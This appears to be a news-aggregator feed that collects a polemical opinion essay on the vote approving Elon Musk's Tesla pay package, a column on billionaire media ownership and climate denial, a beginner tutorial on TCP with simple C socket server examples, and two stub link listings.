So, Musk won the vote for his “$1 trillion pay package”. Truth be told, I am not that surprised. But what does this mean for Tesla and its future? Well, in short, nothing good. This is the final cast-off, solidifying Musk as an untouchable authoritarian king of Tesla, enabling and exaggerating his already broken delusions — all while Tesla leaves the shores of reality and sails off into the murky waters of a demonstrably false unreality. It will all end in tears.

Let’s start off by de-propagandising this mess.

This isn’t a $1 trillion pay package. Logically, Musk would be paid in Tesla stock, and for this payday to be worth $1 trillion, Tesla would have to be worth $8.5 trillion, or just less than eight times its current value. This is more than 50% more than the current most valuable company in the world, Nvidia, whose value most experts believe is significantly inflated by the AI bubble. This value increase isn’t one of the conditions for Musk receiving his payout; instead, it is assumed this is how much Tesla will be worth if he achieves the other conditions. However, one of these conditions is that Tesla achieves annual revenue of up to $400 billion and an $8.4 trillion valuation, which would give Tesla a P/E ratio (the value of its stock to its earnings) of 21,250, or over 100 times its current, already far too high, P/E ratio. So no — in no fucking world is this a $1 trillion pay package. You would have to be out of your mind to believe that for a second. It is more like a $100 billion package. This “$1 trillion” thing is just a PR stunt, a way to make Musk and Tesla look much more impressive than they actually are (with more on that in a minute).

On top of that, the conditions Musk has to meet to receive this payday are nowhere near specific enough to hold him to account and ensure he actually delivers growth. I have already written about this, so if you want to know the details, read more here .

Take the condition that by 2035, Musk is expected to deliver one million Bots. (Tesla defines “Bot” as “any robot or other physical product with mobility using artificial intelligence manufactured by or on behalf of the company” — yet, somehow, the company’s vehicles do not count). Firstly, it is odd that they use the word “delivered” instead of “sold”, given that the number of sales is a much better metric for growth. In fact, the proper metric for growth would be how many Bots are in active use and the duration of this time period. So, for Musk to meet this condition, he doesn’t even need to sell the Optimus robot he has been parading around. He can give SpaceX a million AI-powered RC cars, akin to that weird robot on the Death Star, and technically achieve this condition. SpaceX doesn’t even have to use them!

Every single one of these pay package conditions is worded in such a way that Musk can meet them without delivering any actual growth. That is a giant red flag. But we should have expected this, as Tesla’s Master Plan 4, which these conditions are based on, still lacks any real detail — it’s more like a buzzword salad flopped together by Grok.

So, it isn’t a $1 trillion pay package at all; it is closer to a $100 billion pay package (even though this is still far too large for any executive pay), and all of the conditions Musk must meet to get this pay package are worded in such a purposefully broad way, that Musk can meet them all without delivering a single ounce of growth.

Okay, but does Musk deserve this money?

Well, I am firmly in the camp that no one should be a billionaire, let alone have a single $100 billion payday. So, ethically, I don’t think Musk deserves it. This is a man who could have solved world hunger but chose to fund fascism instead, after all.

But when you look at the state of Tesla, it’s hard to argue Musk should even be CEO.

His big projects — the Cybertruck, FSD, and Robotaxi — are demonstrable failures. The Cybertruck was supposed to solidify Tesla’s dominance in the EV market, but instead, it is the largest automotive sales flop in history. FSD was supposed to allow Tesla to produce the first self-driving car, but the system is demonstrably dangerous and light-years behind the competition. Not to mention it too is a sales flop, with Tesla having to slash its prices to even get a handful of customers through the door. Likewise, the Robotaxi is horrifyingly dangerous, which has stalled its rollout, and in the meantime, competitors like Waymo have continued to rapidly expand. Each of these projects has cost Tesla billions of dollars, and none of them are even close to breaking even, let alone making a profit.

And it is all because of Musk’s woeful micromanagement.

Consider that time Musk ignored his executives’ advice not to focus on Robotaxis: they had discovered that even if Robotaxis could be made to work, they wouldn’t make any money, and that Tesla should instead focus on building a more affordable EV (read more here ). Now the Model Y has lost its title as Europe’s best-selling car to the Renault 5, which offers almost exactly the specs and price that the Tesla Model 2 (the affordable EV Musk scrapped to direct funds towards Robotaxis) was meant to have…

On that note, Tesla sales continue to crater to this day, largely because Musk’s political affiliations have destroyed the brand’s value. This has pushed Tesla’s profit margin down to near zero! In fact, as costs rise due to Robotaxi and Optimus development, there is a chance that Tesla will begin to post losses in the near future.

This isn’t a CEO who deserves a raise; it is one who deserves to be ousted.

So, why isn’t he being ousted? And why have shareholders handed him this utterly gargantuan pay package, with such flimsy conditions that a burnt Neuralink test monkey could meet them?

I can see two reasons.

Firstly, blackmail. Tesla’s board repeatedly warned that if this pay package didn’t pass, there was a serious chance Musk would leave Tesla. I say warned — that is a direct threat. Gary Black, a hedge fund manager who heavily backs Tesla, publicly stated that if Musk stepped down, Tesla’s stock could fall by 20% to 25%. However, I, and many others, believe this is a massive underestimation. My own analysis suggests that if Tesla were valued as a car company rather than based on Musk and his bullshit promises, as it would be if Musk left, it would lose closer to 90% of its value (read more here ). Investors know this, so Musk’s threat to leave is more or less him saying, “Pay me all the money, or I will make your investment value collapse.”

You can’t consider a choice “free” if the only options are “Pay me money I don’t deserve or I will hurt you.”

And guess what, investors, big or small, don’t want to lose money. That is a damn good reason why many voted in favour. Needless to say, in many countries, Musk’s and the Tesla Board’s actions here would be seen as corporate extortion and would be wildly illegal.

But the second reason many voted in favour of the pay package is tied to why Tesla is worth so much more than it should be. Quite simply, Musk is a cult leader, and his followers are Tesla investors. He speaks exactly like a cult leader, constantly using internal coded language, thought-terminating clichés, and doublespeak, inducing shame and guilt in outsiders, and using isolating rhetoric. Like all cult leaders, he plays this off with a painfully bad charisma that comes across like the spelling mistakes in those Nigerian Prince emails — a way to filter out the rest and focus on the easy-to-manipulate, desperate people. Then, he sells his big, impossible ideas and waits for these people to invest (i.e., hand over their life savings) in him with the promise that he will make them wildly wealthy down the line. The world of Tesla investing is a cult; the only thing it is missing is the weird robes and sex rituals (presumably).

Sadly, institutions saw this ability and knew they could use it to make themselves a ton of money. They bought in, leaned into Musk’s cult and echoed Musk’s manipulations, pulling more followers in and increasing their investment’s value. That is why analysts like Dan Ives give nonsensical logic for their support of Musk’s ideas. They don’t believe what Musk is saying, but they know someone will, and if they buy in, their investment will go up.

This has caused the public and institutional investors to not look at Tesla logically. The only thing they ask is, “Is this going to bring more people into the cult?” Considering the $1 trillion propaganda line and the fact that the promises Musk is making are on a scale never seen before, most of them likely thought it would. After all, billions of people have been reading for months now about how Musk will be paid a trillion dollars to take over the world economy with robots. What matters isn’t whether that will actually happen, but whether it will spread enough fear, manipulation, and FOMO to bring people in.

Before I looked at the numbers, I thought the latter was closer to the truth. But after, I’m not so sure.

Musk’s pay packet won with 75% of the votes, with Musk’s 15.3% of the votes not counting. That sounds like a landslide, right? Well, it isn’t. Let me explain.

Institutional investors, such as mutual funds and investment banks, own 48.1% of Tesla, public retail investors own 36.3%, and insiders own 15.4% (which is mostly Elon’s 15.3% stake, so we can ignore them in this case).

Almost all institutional investors, such as Vanguard, JPMorgan, and BlackRock, backed Musk’s pay package. Tesla makes up a considerable portion of their investment portfolios, and they can’t risk it collapsing, so almost every single one voted yes purely because of the blackmail. If Musk left, the cult dissolved, and the public investors sold up, they would lose billions!

But only 84.7% of shares voted on this pay packet, meaning that this 48.1% bloc of investors made up 57% of the vote. So, Musk had won this vote before it had ever started.

That also means that the 36.3% of Tesla’s shares held by public retail investors split almost evenly, roughly 50% yes and 50% no. But here is the thing: Tesla’s public investors, of whom there are likely millions, seriously outnumber the few thousand institutional investors. So, if these votes weren’t weighted based on how much stock each person/organisation owned, this would have only just passed by the skin of its teeth!

This shows the cult of Elon is straining. It is being pushed to its limits, and major figures within its ranks were happy to risk losing it all rather than indulge Musk in his demented leadership. The institutional investors who went along with the blackmail will know this. They will know that another push like this could send the public investors, the actual members of the cult, scattering, sending the value of the investment to the floor.

So yes, 75% was a sizeable vote in favour of Musk. But when you consider the makeup of the voters, the cult of Elon, and the blackmail, that 25% no vote suddenly seems like an awfully significant resistance.

Okay, so what about Tesla’s future?

Well, this vote has done two things: severed Tesla’s last connection with reality and provided Musk with total authoritarian control.

As I have already mentioned, Musk shouldn’t be Tesla’s CEO, let alone be given this much wealth. But the fact that he was able to blackmail his own investors into bowing before him has effectively solidified him as the authoritarian leader of Tesla. No one can hold him to account now. He can do with Tesla what he likes.

This is a horrifically bad thing, because Musk is about to wheedle the last drop of reality from Tesla.

For the past few years, while Tesla transformed into the cult stock it is now, it still had to appear at least vaguely realistic. Its plans and technology had to at least theoretically be possible (if not a little moronic). This generated favourable coverage and attracted more people into the cult. As such, for the past six to seven years, Musk had straddled a fine line between outlandish, unrealistic claims to strengthen the cult and a more grounded approach to prevent the whole thing from collapsing.

But this vote wasn’t just about Musk’s pay but about the future direction of Tesla. The conditions Musk has to achieve to get this payday have more to do with self-driving AI and robots than making cars. So a yes vote was a vote for that direction. But, here is the thing: Tesla’s self-driving FSD system is demonstrably dead (read more here ), as is Optimus (read more here ). They will never work, let alone be a viable business, or even be a hyperscale business, as Musk claims they are. Anyone with even a drop of understanding or expertise in these fields can see that. They are not a realistic product and not a realistic way forward for Tesla. The only way they will generate growth is with hype, speculation, and expanding this cult.

As such, this vote was to force Tesla to entirely let go of reality. To indulge Musk in his demonstrably dangerous and unviable delusions, to value speculation and spectacle over material growth or fundamentals, and to enable Musk to cast out anyone who says otherwise.

There is only one problem with this plan: reality catches up to everyone eventually. And when reality comes for cult leaders, things get ugly. Do I need to ask you to Google the Jonestown Massacre?

I have said Tesla is dying for a long time now. But this is the final nail in the coffin. There is now nothing to stop Musk’s self-aggrandising psychosis. The few lifelines that Tesla and Musk’s sanity kept are being severed. Musk is going to push the entire company forward on a falsity, and no one can even ask him not to now, let alone hold him accountable for how reckless and damaging his actions will be. There was once a chance Tesla could turn itself around — to actually remain in the real world and succeed as the automotive giant it was on track to become. But not now. After this, there is no saving Tesla.

is a climate & politics journalist who is pissed off that the world is burning, corrupt and broken, yet no one in power seems to care.

Media Monopoly Fuels Climate Denial

Portside
portside.org
2025-11-15 02:41:26
Media Monopoly Fuels Climate Denial barry Fri, 11/14/2025 - 21:41 ...
Original Article

Illustration: Thomas Pullin/The Guardian

If this were just a climate crisis, we would fix it. The technology, money and strategies have all been at hand for years. What stifles effective action is a deadly conjunction: the climate crisis running headlong into the epistemic crisis.

An epistemic crisis is a crisis in the production and delivery of knowledge. It’s about what we know and how we know it, what we agree to be true and what we identify as false. We face, alongside a global threat to our life-support systems, a global threat to our knowledge-support systems.

Let’s start by recognising that they were never robust. There was no golden age of public knowledge, no moment at which the information most people received was largely unbiased and accurate. Throughout modern history, European societies have formed a broad consensus around blatant falsehoods: such as the view that the monarch embodied all the interests of the nation, that women were unsuited to public life, that Black and Brown people were inferior beings, that empire was a force for good. A vast infrastructure of persuasion was built around these beliefs. Public knowledge is always shaped by power.

The promise of democracy was that the lives of all would steadily improve as knowledge spread: we would turn our gathering understanding of the world into social progress. For a while, in some places, we did. But that era now seems to be coming to an end.

The fundamental problem is this: that most of the means of communication are owned or influenced by the very rich . If democracy is the problem capital is always trying to solve, propaganda is part of the solution. Like the kings and empire-builders of the past, they use their platforms to project the claims that suit them and suppress the claims that don’t. This means boosting right and far-right movements, which defend wealth and power against those who wish to redistribute them.

In the US, we witness a rapid and extreme hardening of this position, as Trump’s allies, old and new, sweep up legacy media platforms – it seems obvious that the result will be ever more unhinged attacks on anyone who challenges capital.

The ultra-rich have also pumped money into new media, such as the online shows that now outrank traditional television news. For example, two fracking billionaires have poured $8m (£6m) into PragerU and $4.7m into the Daily Wire, to extend the reach of these platforms.

Of the world’s 10 most popular online shows, a Yale study shows eight have spread climate science denial. Joe Rogan, who hosts one of the world’s most popular shows, has repeatedly claimed that the Earth is cooling, drawing on research that says the opposite.

A new investigation of Elon Musk’s X by Sky News found that every account set up by reporters, “no matter their political orientation, was fed a glut of rightwing content”, much of which was extreme. The experts it consulted believe this pattern could have resulted only from an algorithm engineered for this purpose, and that “an algorithmic bias must be decided by senior people at the channel”. (X, for its part, told Sky News it was “dedicated to fostering an open, unbiased public conversation”.) A separate study found the spread of misinformation on X is most associated with politicians on the radical right: mainstream or leftist representatives are far less likely to spread falsehoods. The radical right leans heavily into climate science denial and obstruction of environmental measures: this is why it is sponsored by fossil fuel companies .

Capital has willing workers even in the media that aren’t owned by billionaires. A devastating new article by Peter Coviello, professor of American literature at the University of Illinois, records how he and his former college became collateral damage in the campaign waged by the New York Times against Zohran Mamdani, now mayor-elect of New York City. Coviello explains a process grimly familiar to climate scientists: equating expert opinion with commentary from paid lobbyists. No attempt is made to examine “the relation between those two ‘sides,’ or their histories, or their sponsors, or their relative evidentiary authority”. If, he argues, you have the money to fund a junktank, it will produce whatever opinion you request, then papers such as the New York Times will balance that opinion against decades of academic study, as if the two things are of equal weight.

This also describes the BBC’s understanding of “impartiality”. While it no longer provides a platform for outright climate denial, almost every day it breaks its own editorial guidelines by hosting Tufton Street junktanks (which often argue against environmental action) without revealing who funds them. Shouldn’t we be allowed to know whether or not they are sponsored by fossil fuel companies?

The BBC told its presenter Evan Davis to stop making his own podcast about heat pumps, on the grounds that discussing this technology meant “treading on areas of public controversy”. Why are heat pumps controversial? Because the Energy and Utilities Association, which lobbies for gas appliances, paid a public affairs company to make them so. The company, WPR, boasted that it set out to “ spark outrage ”. The media, BBC included, were all too happy to oblige.

None of this has obliged any BBC executive to resign. Nor did the plan discussed by former director general Tim Davie and former head of news Deborah Turness to alter “story selection and other types of output, such as drama” to “ address low trust issues with Reform voters”. Nor did editing an interview with Jeremy Corbyn to produce a misrepresentation far more serious than Panorama’s edit of a speech by Donald Trump. Nor did its mock-up of a Soviet propaganda poster featuring Corbyn, using the classic Stalinist image of a rayed red dawn . I cannot think of an occasion on which anyone at the BBC has had to resign for misrepresenting a leftwinger. But the appeasement of the right never ends, and nor will it ever be satisfied.

In this media climate, it’s not surprising that governments are retreating from climate action. In June, a review by the International Panel on the Information Environment found that “ inaccurate or misleading narratives ” in the media about climate breakdown create “a feedback loop between scientific denialism and political inaction”. The results can be seen at the current Cop30 climate talks, whose president, André Corrêa do Lago, remarks on a “ reduction in enthusiasm ” among rich nations.

It didn’t happen by accident. It’s the product of a deliberate and systematic assault on knowledge by some of the richest people on Earth. Preventing climate breakdown means protecting ourselves from the storm of lies.


The Internet Is Cool. Thank You, TCP

Hacker News
cefboud.com
2025-11-15 06:37:50
Comments...
Original Article

The Internet is Cool. Thank you, TCP

The internet is incredible. It’s nearly impossible to keep people away from. But it can also be unreliable: packets drop, links congest, bits mangle, and data corrupts. Oh, it’s dangerous out there! (I’m writing this in Kramer’s tone)

So how is it possible that our apps just work? If you’ve networked your app before, you know the drill: socket() / bind() here, accept() there, maybe a connect() over there, and it just works. Reliable, orderly, uncorrupted data flows to and fro.

Websites (HTTP), email (SMTP) or remote access (SSH) are all built on top of TCP and just work.

Why TCP

Why do we need TCP? Why can’t we just use the layer below, IP?

Remember, the network stack goes: Physical –> Data Link (Ethernet/Wi-Fi, etc) –> Network (IP) –> Transport (TCP/UDP).

IP (Layer 3) operates at the host level, while the transport layer (TCP/UDP) works at the application level using ports. IP can deliver packets to the correct host via its IP address, but once the data reaches the machine, it still needs to be handed off to the correct process. Each process “binds” to a port: its address within the machine. A common analogy is: the IP address is the building, and the port is the apartment. Processes or apps live in those apartments.

Another reason we need TCP is that if a router (a piece of infra your average user does not control) drops packets or becomes overloaded, TCP at the edges (on the users’ machines) can recover without requiring routers to participate. The routers stay simple, the reliability happens at the endpoints.

Packets get lost, corrupted, duplicated, and reordered. That’s just how the internet works. TCP shields developers from these issues. It handles retransmission, checksums, and a gazillion other reliability mechanisms. If every developer had to implement those themselves, they’d never have time to properly align their flexboxes, a truly horrendous alternate universe.

Jokes aside, the guarantee that data sent and received over a socket isn’t corrupted, duplicated, or out of order, despite the underlying network being unreliable, is exactly why TCP is awesome.

Flow and Congestion Control

When you step back and think about network communication, here’s what we’re really trying to do: machine A sends data to machine B. Machine B has a finite amount of space and must store the incoming data somewhere before passing it to the application, which might be asleep or busy. This temporary storage is called the receive buffer and is managed by the kernel:

sysctl net.ipv4.tcp_rmem => net.ipv4.tcp_rmem = 4096 131072 6291456 , i.e. a min of 4 KB, a default of 128 KB, and a max of 6 MB.

The problem is that space is finite. If you’re transferring a large file (hundreds of MBs or even GBs), you could easily overwhelm the destination. The receiver therefore needs a way to tell the sender how much more data it can handle. This mechanism is called flow control , and TCP segments include a field called the window , which specifies how much data the receiver is currently willing to accept.
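
To make the receive buffer less abstract, here is a minimal sketch, assuming Linux and the standard Berkeley socket API, that reads a socket’s receive buffer size with getsockopt and asks for a larger one with setsockopt. (The requested size is capped by net.core.rmem_max, and Linux reports roughly double what you asked for, to account for bookkeeping overhead.)

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>

int main(void) {
    int fd = socket(AF_INET, SOCK_STREAM, 0);

    int rcvbuf = 0;
    socklen_t len = sizeof(rcvbuf);
    // Read the current receive buffer size, in bytes.
    getsockopt(fd, SOL_SOCKET, SO_RCVBUF, &rcvbuf, &len);
    printf("default SO_RCVBUF: %d bytes\n", rcvbuf);

    // Ask for a bigger buffer; the kernel clamps this to net.core.rmem_max.
    int want = 256 * 1024;
    setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &want, sizeof(want));

    getsockopt(fd, SOL_SOCKET, SO_RCVBUF, &rcvbuf, &len);
    printf("new SO_RCVBUF: %d bytes\n", rcvbuf);

    close(fd);
    return 0;
}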

Another issue is overwhelming the network itself, even if the receiving machine has plenty of buffer space. You’re only as strong as your weakest link: some links carry gigabits, others only megabits. If you don’t tune for the slowest link, congestion is inevitable.

Fun fact: in 1986, the Internet’s bandwidth dropped from a few dozen kbit/s to as low as 40 bps (yes, bits per second! yes, those numbers are wild!), in what became known as congestion collapse . When packets were lost and systems retried sending them, they made congestion even worse: a doom loop. To fix this, TCP incorporated ‘play nice’ and ‘back off’ behaviors known as congestion control , which help prevent the Internet from clogging itself to death.
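
On Linux you can peek at which congestion control algorithm a socket is using (CUBIC is the usual default, as the ss output later in this post shows) via the TCP_CONGESTION socket option. A minimal sketch, assuming a Linux kernel:

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <unistd.h>

int main(void) {
    int fd = socket(AF_INET, SOCK_STREAM, 0);

    char algo[16] = {0};
    socklen_t len = sizeof(algo);
    // TCP_CONGESTION returns the name of the congestion control module, e.g. "cubic".
    if (getsockopt(fd, IPPROTO_TCP, TCP_CONGESTION, algo, &len) == 0)
        printf("congestion control: %s\n", algo);

    // Switching algorithms (e.g. to "reno") works the same way with setsockopt,
    // provided that module is available in the kernel.
    close(fd);
    return 0;
}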

Some Code: A Plain TCP Server

With all low-level things like TCP, C examples are the way to go. Just show it like it is.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <signal.h>

int sockfd = -1, clientfd = -1;
void handle_sigint(int sig) {
    printf("\nCtrl+C caught, shutting down...\n");
    if (clientfd != -1) close(clientfd);
    if (sockfd != -1) close(sockfd);
    exit(0);
}

int main() {
    signal(SIGINT, handle_sigint);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    int opt = 1;
    // SO_REUSEADDR to force bind to the port even if an older socket is still terminating (TIME_WAIT)
    setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));

    struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(8080), .sin_addr.s_addr = INADDR_ANY };
    bind(sockfd, (struct sockaddr*)&addr, sizeof(addr));
    listen(sockfd, 5);
    printf("Listening on 8080...\n");

    clientfd = accept(sockfd, NULL, NULL);
    char buf[1024], out[2048];
    int n;
    while ((n = recv(clientfd, buf, sizeof(buf) - 1, 0)) > 0) {
        buf[n] = '\0';
        int m = snprintf(out, sizeof(out), "you sent: %s", buf);
        printf("response %s %d\n", out, m);
        send(clientfd, out, m, 0);
    }
    close(clientfd); close(sockfd);
}

This creates a TCP server that echoes back whatever the client sends, prefixed with ‘you sent: ’.

# compile and run server
gcc -o server server.c  && ./server
# connect client
telnet 127.0.0.1 8080
# hi
# you sent: hi

127.0.0.1 (localhost) could be replaced with a remote IP and it should work all the same.

The primitives/functions we used follow the Berkeley socket way of doing things (released with BSD 4.2):

  • SOCKET : create an endpoint (structure in the kernel).
  • BIND : associate to a port.
  • LISTEN : get ready to accept connections and specify a queue size for pending connections (beyond that size, drop!)
  • ACCEPT : accept an incoming connection (TCP Server)
  • CONNECT : attempt connection (TCP client)
  • SEND : send data
  • RECEIVE : receive data
  • CLOSE : release the connection

In the example above, we’re using client/server dynamics in a request/response pattern. But I can add the following after send :

send(clientfd, out, m, 0);
sleep(5);
const char *msg = "not a response, just doing my thing\n";
send(clientfd, msg, strlen(msg), 0);

Compile, run, and telnet:

client here
you sent: client here
client again
not a response, just doing my thing
you sent: client again

I typed in the telnet terminal: client here , then client again . I only got you sent: client here , then the server was sleeping. My second line, client again , was patiently waiting in the receive buffer. The server sent not a response, just doing my thing , then picked up my second TCP packet and replied with you sent: client again .

This is very much a duplex bidirectional link. Each side sends what it wishes, it just happens that at the beginning, one listens and the other connects. The dynamics afterwards don’t have to follow a request/response pattern.
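
For completeness, here is the other side of the conversation: a minimal client sketch (error handling omitted, just like the server above) that connects to 127.0.0.1:8080, sends one line, and prints the echo.

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int main(void) {
    int fd = socket(AF_INET, SOCK_STREAM, 0);

    struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(8080) };
    inet_pton(AF_INET, "127.0.0.1", &addr.sin_addr);

    // connect() establishes the connection with the listening server.
    connect(fd, (struct sockaddr*)&addr, sizeof(addr));

    const char *msg = "hi from the client\n";
    send(fd, msg, strlen(msg), 0);

    char buf[1024];
    int n = recv(fd, buf, sizeof(buf) - 1, 0);
    if (n > 0) {
        buf[n] = '\0';
        printf("server said: %s", buf);
    }
    close(fd);
    return 0;
}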

Catfishing Curl: A Dead Simple HTTP Server

Let’s create a very simple HTTP/1.1 server (later versions are trickier).

    // same as before
    printf("Listening on 8080...\n");
    int i = 1;
    while (1) {
        clientfd = accept(sockfd, NULL, NULL);
        char buf[1024], out[2048];
        int n;
        while ((n = recv(clientfd, buf, sizeof(buf) - 1, 0)) > 0) {
            buf[n] = '\0';
            int body_len = snprintf(out, sizeof(out), "[%d] Yo, I am a legit web server\n", i++);

            char header[256];
            int header_len = snprintf(
                header, sizeof(header),
                "HTTP/1.1 200 OK\r\n"
                "Content-Type: text/plain\r\n"
                "Content-Length: %d\r\n"
                "Connection: close\r\n"
                "\r\n",
                body_len
            );
            printf("header: %s\n", header);
            printf("out: %s\n", out);
            send(clientfd, header, header_len, 0);
            send(clientfd, out, body_len, 0);
            break;   // one request per connection
        }
        close(clientfd);
    }

~ curl localhost:8080                                                                                               
[1] Yo, I am a legit web server
~ curl localhost:8080
[2] Yo, I am a legit web server

We’re using i to keep count of requests. We’re establishing a TCP connection and returning the HTTP headers expected by the HTTP client (the TCP peer, really). A real HTTP server would return proper HTML, CSS, and JS, and handle a whole lot of other options and headers. But underneath, it’s simply a process making use of our reliable, dependable TCP.

The Actual Bytes

  0                   <----- 32 bits ------>                     
  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |        Source Port              |     Destination Port        |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                        Sequence Number                        |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                    Acknowledgment Number                      |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 | Header|Rese-|   Flags   |       Window Size                   |
 | Len   |rved |           |                                     |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |       Checksum                  |     Urgent Pointer          |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                    Options (if any)                           |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                    Data (Payload)                             |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Each TCP segment has the header above, and each TCP segment is contained within an IP packet. We have source and destination ports, each 16 bits, and that’s where the 64k port limit comes from!

Each transport-layer connection is identified by a 5-tuple: (protocol [TCP or UDP], src IP, src port, dst IP, dst port) .

Sequence and Acknowledgment Numbers

TCP reliability depends on two key fields: the Sequence number , indicating which bytes a segment carries, and the Acknowledgment number , indicating which bytes have been received. Sequence numbers let the receiver interpret data order, detect and reorder out-of-order segments, and identify losses. TCP uses cumulative acknowledgments —an ACK of 100 means bytes 0-99 were received. If bytes 100-120 are lost but later bytes arrive, the ACK remains 100 until the missing data is received.

1. A --> B: Send [Seq=0-99]
2. B --> A: Send [Seq=0-49]

3. B --> A: Receives A's [0-99] --> sends ACK=100
4. A --> B: Receives B's [0-49] --> sends ACK=50

5. A --> B: Send [Seq=100-199]   --- lost ---
6. B --> A: Send [Seq=50-99]     --- lost ---

7. A --> B: Send [Seq=200-299]
   B receives --> notices gap (100-199 missing) --> sends ACK=100

8. B --> A: Send [Seq=100-149]
   A receives --> notices gap (50-99 missing) --> sends ACK=50

9. A --> B: Send [Seq=300-399]
   B still missing 100-199 --> sends ACK=100

10. B --> A: Send [Seq=150-199]
    A still missing 50-99 --> sends ACK=50

11. A --> B: Retransmit [Seq=100-199]
    B receives --> now has 0-399 --> sends ACK=400

12. B --> A: Retransmit [Seq=50-99]
    A receives --> now has 0-199 --> sends ACK=200

Header Length shows how many 4-byte words are in the header, needed because the Options field is variable length, and thus so is the header.

TCP Flags

Next are 8 flags (1 bit each). A few important ones:

SYN : used to establish a connection. ACK : indicates the Acknowledgment number is valid.

These two flags are central to connection setup. Why establish a connection? To detect out-of-order or duplicate segments, you must track what has been sent and received, i.e., maintain state: a connection.

SYN and ACK participate in the famous 3-way handshake:

  • A –> B: SYN (I want to connect)
  • B –> A: SYN + ACK (I got your SYN, I want to connect too!)
  • A –> B: ACK (got it, connection established!)

The FIN flag signals teardown and also uses a handshake:

  • X –> Y: FIN (I want to disconnect)
  • Y –> X: ACK (got your FIN, whatever!)
  • Y –> X: FIN (I want to disconnect too - sometimes sent with the previous ACK)
  • X –> Y: ACK (got it!)

This is normally a 4-way (sometimes 3-way) goodbye handshake.

RST is the reset flag. It indicates an error or forced shutdown — drop the connection immediately. An OS sends RST if no process is listening or if the listening process crashed. There’s also a known TCP reset attack where intermediaries inject RST to terminate connections (used by some firewalls).
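
You can see an RST from userspace without any packet capture: connect to a port where nothing is listening and the OS answers the SYN with RST, which surfaces as ECONNREFUSED. A minimal sketch, assuming nothing is bound to 127.0.0.1:9999 on your machine:

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int main(void) {
    int fd = socket(AF_INET, SOCK_STREAM, 0);

    struct sockaddr_in addr = { .sin_family = AF_INET, .sin_port = htons(9999) };
    inet_pton(AF_INET, "127.0.0.1", &addr.sin_addr);

    // No process is listening on 9999, so the SYN is answered with RST
    // and connect() fails with ECONNREFUSED.
    if (connect(fd, (struct sockaddr*)&addr, sizeof(addr)) < 0)
        printf("connect failed: %s\n", strerror(errno)); // prints "Connection refused"

    close(fd);
    return 0;
}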

Window

We talked about this field in flow control. As mentioned above, it indicates how many bytes the receiver is willing to accept beyond the acknowledged byte number.

With the example above, running ss (Socket Statistics) provides info about the TCP connection.

ss -tlpmi
// State    Recv-Q   Send-Q       Local Address:Port           Peer Address:Port   Process    
// LISTEN   0        5                  0.0.0.0:http-alt            0.0.0.0:*       users:(("server",pid=1113,fd=3))
// 	 skmem:(r0,rb131072,t0,tb16384,f0,w0,o0,bl0,d0) cubic cwnd:10

rb131072 (128 KB) is the receive buffer size, while tb16384 (16 KB) is the transmit buffer size, where data waits before being sent over the network. Send-Q indicates bytes not yet acknowledged by the remote host, and Recv-Q shows bytes received but not yet read by the application (e.g., the second line typed in the telnet session above, which sat in the receive buffer while the server was sleeping).

Checksum

The checksum is used for reliability. All 16-bit words in the TCP segment (plus a pseudo-header containing the IP addresses) are summed using one’s-complement arithmetic, and the receiver compares the result against the checksum field. If they don’t match, some bits were likely corrupted, the segment is dropped, and retransmission is needed.
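
The arithmetic is simple enough to sketch. Below is a generic Internet-checksum routine in the style of RFC 1071: sum the 16-bit words with end-around carry (one’s-complement addition), then invert. For TCP the kernel feeds in the header, the payload, and the pseudo-header; this sketch, with a made-up byte array, only shows the core sum.

#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

// One's-complement sum of 16-bit words (RFC 1071 style).
uint16_t inet_checksum(const uint8_t *p, size_t len) {
    uint32_t sum = 0;

    while (len > 1) {                  // add each 16-bit word
        sum += (uint32_t)((p[0] << 8) | p[1]);
        p += 2;
        len -= 2;
    }
    if (len == 1)                      // pad an odd trailing byte with zero
        sum += (uint32_t)(p[0] << 8);

    while (sum >> 16)                  // fold the carries back in (end-around carry)
        sum = (sum & 0xFFFF) + (sum >> 16);

    return (uint16_t)~sum;             // one's complement of the sum
}

int main(void) {
    uint8_t segment[] = { 0x1f, 0x90, 0x00, 0x50, 0xde, 0xad, 0xbe, 0xef };
    printf("checksum: 0x%04x\n", inet_checksum(segment, sizeof(segment)));
    return 0;
}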

Conclusion

It always amazes me how all this works. The network, the internet. Reliably and continuously. Just a few decades ago, sending a few KB was quite the feat. And today, streaming 4K is routine. God bless all those hardworking people that made and make it all possible!

Ohm Editor

Hacker News
ohmjs.org
2025-11-15 06:01:29
Comments...
Original Article

So, you want to design your own language?

Hacker News
cs.lmu.edu
2025-11-15 05:44:43
Comments...
Original Article

Language Design

